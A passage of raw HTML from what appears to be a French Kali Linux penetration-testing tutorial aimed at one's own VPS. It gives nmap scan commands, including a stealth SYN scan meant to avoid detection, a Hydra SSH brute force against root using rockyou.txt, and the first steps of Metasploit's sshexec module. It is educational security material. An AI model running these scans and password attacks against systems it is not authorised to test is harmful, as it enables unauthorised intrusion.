cours d&rsquo;ex&eacute;cution sur la cible, ex&eacute;cutez :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -O [ip_cible]<\/pre><p>L&rsquo;option <strong>-O <\/strong>active la d&eacute;tection du syst&egrave;me d&rsquo;exploitation, qui devine le syst&egrave;me d&rsquo;exploitation en se basant sur les r&eacute;ponses de la cible. N&rsquo;oubliez pas que Nmap ne devine pas toujours correctement, car il ne fournit qu&rsquo;un pourcentage de probabilit&eacute; pour chaque syst&egrave;me d&rsquo;exploitation correspondant.<\/p><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dd89a7\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"370\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-o-terminal.png\/public\" alt=\"La sortie de la commande nmap -O\" class=\"wp-image-38081\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-o-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-o-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-o-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-o-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Scan complet avec service, syst&egrave;me d&rsquo;exploitation et timing agressif<\/strong><\/p><p>Pour une analyse approfondie qui inclut les ports courants, les services en cours d&rsquo;ex&eacute;cution et la d&eacute;tection du syst&egrave;me d&rsquo;exploitation, ex&eacute;cutez :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -A [ip_cible]<\/pre><p>Cette commande est plus agressive : elle envoie des paquets plus personnalis&eacute;s, appel&eacute;s sondes, afin de recueillir des informations susceptibles de d&eacute;clencher des pare-feux ou des syst&egrave;mes de d&eacute;tection d&rsquo;intrusion.<\/p><p>L&rsquo;option <strong>-A <\/strong>permet :<\/p><ul class=\"wp-block-list\">\n<li>La d&eacute;tection du syst&egrave;me d&rsquo;exploitation.<\/li>\n\n\n\n<li>La d&eacute;tection de version.<\/li>\n\n\n\n<li>L&rsquo;analyse des scripts.<\/li>\n\n\n\n<li>Le Traceroute.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dd9133\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"605\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-a-terminal.png\/public\" alt=\"La sortie de la commande nmap -A\" class=\"wp-image-38082\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-a-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-a-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-a-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-a-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Scan furtif pour &eacute;viter la d&eacute;tection<\/strong><\/p><p>En revanche, si vous pr&eacute;f&eacute;rez une analyse subtile moins susceptible d&rsquo;&ecirc;tre d&eacute;tect&eacute;e par les pare-feu ou les syst&egrave;mes de d&eacute;tection d&rsquo;intrusion, essayez un scan TCP SYN :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -sS [ip_cible]<\/pre><p>L&rsquo;option <strong>-sS <\/strong>effectue un scan SYN, &eacute;galement appel&eacute; scan &laquo;&nbsp;semi-ouvert&nbsp;&raquo;, qui n&rsquo;&eacute;tablit pas compl&egrave;tement une connexion TCP, ce qui r&eacute;duit le risque de d&eacute;clencher des alarmes.<\/p><p><strong>Scan des ports sp&eacute;cifiques<\/strong><\/p><p>Vous pouvez sp&eacute;cifier une plage si vous ne devez scanner que certains ports. Par exemple :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -p 1-100 [ip_cible]<\/pre><p>Cette fonction permet de scanner uniquement les ports <strong>1 <\/strong>&agrave; <strong>100.<\/strong> Ajustez la plage si n&eacute;cessaire pour gagner du temps.<\/p><p><strong>Sauvegarde des r&eacute;sultats du scan<\/strong><\/p><p>Vous pouvez enregistrer les r&eacute;sultats du scan dans des fichiers pour une analyse ult&eacute;rieure :<\/p><ul class=\"wp-block-list\">\n<li>Sortie normale, utile pour les examens rapides :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -oN scan_results.txt [ip_cible]<\/pre><ul class=\"wp-block-list\">\n<li>Format XML, id&eacute;al pour importer les r&eacute;sultats dans d&rsquo;autres outils :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -oX scan_results.xml [ip_cible]<\/pre><h3 class=\"wp-block-heading\" id=\"h-effectuer-des-attaques-par-force-brute-sur-les-identifiants-de-connexion-avec-hydra\">Effectuer des attaques par force brute sur les identifiants de connexion avec Hydra <\/h3><p>Vous pouvez &eacute;galement utiliser Kali Linux pour tester les identifiants de connexion &agrave; l&rsquo;aide de Hydra. Il s&rsquo;agit d&rsquo;un puissant outil de craquage de mots de passe qui fonctionne sur diff&eacute;rents protocoles, notamment SSH, FTP et HTTP.<\/p><p>Veuillez noter que vous devez conna&icirc;tre le nom d&rsquo;utilisateur de votre cible pour utiliser Hydra de mani&egrave;re efficace. Dans notre cas, le nom d&rsquo;utilisateur par d&eacute;faut est <strong>root<\/strong>. Suivez les &eacute;tapes suivantes :<\/p><p><strong>Extraire la liste de mots<\/strong><\/p><p>Une liste de mots (wordlist) est importante pour Hydra car il essaie de trouver chaque mot de passe de la liste jusqu&rsquo;&agrave; ce qu&rsquo;il trouve une correspondance. Kali Linux inclut une liste de mots populaire, <strong>rockyou.txt<\/strong>, que vous pouvez trouver &agrave; l&rsquo;adresse suivante :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/usr\/share\/wordlists\/rockyou.txt.gz<\/pre><p>Si le fichier <strong>rockyou.txt.gz <\/strong>est pr&eacute;sent, extrayez-le avec :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo gunzip \/usr\/share\/wordlists\/rockyou.txt.gz<\/pre><p>Cela cr&eacute;era le fichier <strong>rockyou.txt <\/strong>dans le m&ecirc;me r&eacute;pertoire.<\/p><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dd9ccc\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"126\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/liste-de-mots-terminal.png\/public\" alt=\"Le fichier rockyou.txt dans le r&eacute;pertoire wordlists\" class=\"wp-image-38083\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/liste-de-mots-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/liste-de-mots-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/liste-de-mots-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/liste-de-mots-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Cependant, si le fichier <strong>rockyou.txt.gz <\/strong>est manquant, vous devez installer le paquet wordlists :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update\n\nsudo apt install wordlists<\/pre><p>Cela devrait installer le fichier <strong>rockyou.txt.gz<\/strong>, et vous pourrez ensuite l&rsquo;extraire comme expliqu&eacute; pr&eacute;c&eacute;demment.<\/p><p>Vous pouvez &eacute;galement cr&eacute;er votre propre wordlist si vous souhaitez un ensemble de mots de passe plus restreint et plus cibl&eacute;.<\/p><p><strong>Ex&eacute;cuter Hydra<\/strong><\/p><p>Maintenant que tout est pr&ecirc;t, utilisez la commande suivante pour effectuer une attaque par force brute des connexions SSH sur votre VPS cible :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">hydra -l root -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/[ip_cible]<\/pre><p>Dans cette commande, remplacer :<\/p><ul class=\"wp-block-list\">\n<li><strong>root <\/strong>&ndash; le nom d&rsquo;utilisateur que vous souhaitez tester.<\/li>\n\n\n\n<li><strong>\/usr\/share\/wordlists\/rockyou.txt <\/strong>&ndash; le chemin vers votre wordlist personnalis&eacute;e si vous en utilisez une.<\/li>\n\n\n\n<li><strong>[ip_cible] <\/strong>&ndash; l&rsquo;adresse IP de votre VPS cible.<\/li>\n<\/ul><p><strong>Interpr&eacute;ter les r&eacute;sultats<\/strong><\/p><p>Hydra commence &agrave; tester chaque mot de passe de la liste. En cas de tentative r&eacute;ussie, Hydra l&rsquo;affiche dans le terminal, en indiquant le mot de passe correct. Par exemple :<\/p><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dda89f\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"221\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-hydra-terminal.png\/public\" alt=\"Le r&eacute;sultat d'une tentative de for&ccedil;age brutal par Hydra\" class=\"wp-image-38084\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-hydra-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-hydra-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-hydra-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-hydra-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>N&rsquo;oubliez pas que le brute-forcing peut prendre de quelques minutes &agrave; plusieurs jours, en fonction de la taille de votre liste de mots et de la complexit&eacute; du mot de passe cible.<\/p><h3 class=\"wp-block-heading\" id=\"h-exploiter-des-systemes-cibles-avec-metasploit\">Exploiter des syst&egrave;mes cibles avec Metasploit<\/h3><p>Outil de test de p&eacute;n&eacute;tration tr&egrave;s r&eacute;pandu, Metasploit Framework propose des modules permettant d&rsquo;exploiter les vuln&eacute;rabilit&eacute;s, de tester la s&eacute;curit&eacute;, de d&eacute;livrer des charges utiles et de maintenir l&rsquo;acc&egrave;s aux syst&egrave;mes cibles.<\/p><p>Voici comment d&eacute;marrer avec Metasploit :<\/p><p><strong>Lancer Metasploit<\/strong><\/p><p>Ouvrez Metasploit en tapant :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfconsole<\/pre><p>La console Metasploit s&rsquo;affiche alors, vous permettant de rechercher et d&rsquo;ex&eacute;cuter des exploits et des charges utiles.<\/p><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474ddb0fa\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"674\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/console-metasploit-terminal.png\/public\" alt=\"La console Metasploit dans le terminal\" class=\"wp-image-38085\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/console-metasploit-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/console-metasploit-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/console-metasploit-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/console-metasploit-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Recherche d&rsquo;un exploit<\/strong><\/p><p>En vous basant sur ce que vous avez d&eacute;couvert avec Nmap, comme les ports et les services ouverts, recherchez les exploits pertinents dans Metasploit. Par exemple, si votre cible a un service SSH en cours d&rsquo;ex&eacute;cution, recherchez les exploits li&eacute;s &agrave; SSH :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">search ssh<\/pre><p>Metasploit vous renverra une liste d&rsquo;exploits correspondants que vous pourrez utiliser.<\/p><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474ddb736\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"574\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/modules-ssh-console-metasploit-terminal.png\/public\" alt=\"Les exploits li&eacute;s &agrave; SSH dans la console Metasploit\" class=\"wp-image-38086\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/modules-ssh-console-metasploit-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/modules-ssh-console-metasploit-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/modules-ssh-console-metasploit-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/modules-ssh-console-metasploit-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>S&eacute;lectionner et mettre en place un exploit<\/strong><\/p><p>Choisissez un exploit dans la liste. Pour cet exemple, nous utiliserons <strong>sshexec<\/strong>, un module qui ex&eacute;cute des commandes sur un syst&egrave;me cible via SSH. Ce module n&rsquo;est pas techniquement un exploit au sens traditionnel du terme ; il s&rsquo;agit d&rsquo;un outil de post-authentification qui n&eacute;cessite des informations d&rsquo;identification SSH valides.<\/p><p>Puisque nous connaissons d&eacute;j&agrave; le mot de passe de la cible apr&egrave;s avoir fait du brute-forcing avec Hydra, nous pouvons utiliser ce module pour interagir avec la cible. Bien que cela soit similaire &agrave; une connexion directe via un terminal, l&rsquo;utilisation de <strong>sshexec <\/strong>ajoute plus de flexibilit&eacute; car il offre des fonctionnalit&eacute;s de post-exploitation.<\/p><p>Chargez le module <strong>sshexec :<\/strong><\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">use exploit\/multi\/ssh\/sshexec<\/pre><p>Apr&egrave;s avoir charg&eacute; l&rsquo;exploit, v&eacute;rifiez les options requises :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">show options<\/pre><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474ddbd0c\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"376\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/metasploit-console-sshexec.png\/public\" alt=\"Les champs obligatoires PASSWORD et RHOSTS du module sshexec \" class=\"wp-image-38087\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/metasploit-console-sshexec.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/metasploit-console-sshexec.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/metasploit-console-sshexec.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/metasploit-console-sshexec.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 